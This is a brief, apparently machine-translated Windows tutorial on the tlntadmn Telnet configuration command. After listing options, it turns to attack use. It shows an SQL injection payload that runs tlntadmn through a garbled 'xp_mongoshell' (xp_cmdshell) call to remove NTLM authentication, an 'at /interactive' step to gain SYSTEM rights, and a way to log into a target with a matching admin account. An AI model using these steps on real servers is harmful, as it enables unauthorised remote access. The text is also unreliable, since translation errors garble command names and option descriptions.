Telnet can help us complete remote login settings. How does the Administrator manage systems such as port authentication? Here we will introduce the usage of the tlntadmn command. This command can help us complete the settings of the telnet service. Tlntadmn is the telnet service setting command. You can set the port and authentication method of the telnet service:
Usage: tlntadmn [computer name] [common_options] start | stop | pause | continue |-s |-k |-m | config config_options
All sessions use 'all '.
- -S sessionid lists session information.
- -K sessionid: Terminate the session.
- -M sessionid: send a message to the session.
- Configure the Telnet server parameters in config.
-
- Common_options:
- -U user specifies the user whose creden are to be used
- -P password: User password
- Config_options:
- Dom = domain: Set the user's default domain
- Ctrlakeymap = yes | no sets the ALT ing of the ALT key
- Timeout = hh: mm: ss sets the idle session timeout value timeoutactive = yes | no enables the idle session.
- Maxfail = attempts set the number of logon attempts that failed before disconnection.
- Maxconn = connections sets the maximum number of connections.
- Port = number: Set the Telnet port.
- Sec = [+/-] NTLM [+/-] passwd set the authentication authority
- Fname = file specifies the audit file name.
- Fsize = size specifies the maximum size (MB) of the audit file ).
- Mode = console | stream specifies the operation mode.
- Auditlocation = eventlog | file | both specifies the record location
- Audit = [+/-] user [+/-] fail [+/-] admin specifies the audit Event
Usage:
Run the following command: tlntadmn config sec =-ntlm
Run:; exec master. dbo. xp_mongoshell 'tlntadmn config sec =-ntlm' -- after the injection, ntlm authentication is removed.
- C: \> tlntadmn config sec =-ntlm --------------- use admin permission
- C: \> at 20:43/interactive "cmd" ----------- enable the system permission using the at command
- A new job is added. Its job ID is 1.
- C: \ WINNT \ system32> tlntadmn config sec =-ntlm
Another method to remove NTML verification: Create an administrator user on the target host! Create a user with the same account and password as the target host on the local machine, right-click on the local machine CMD and select the running mode ~ Enter the account and password to directly Telnet the target IP address of the service, which can be used for NTML verification.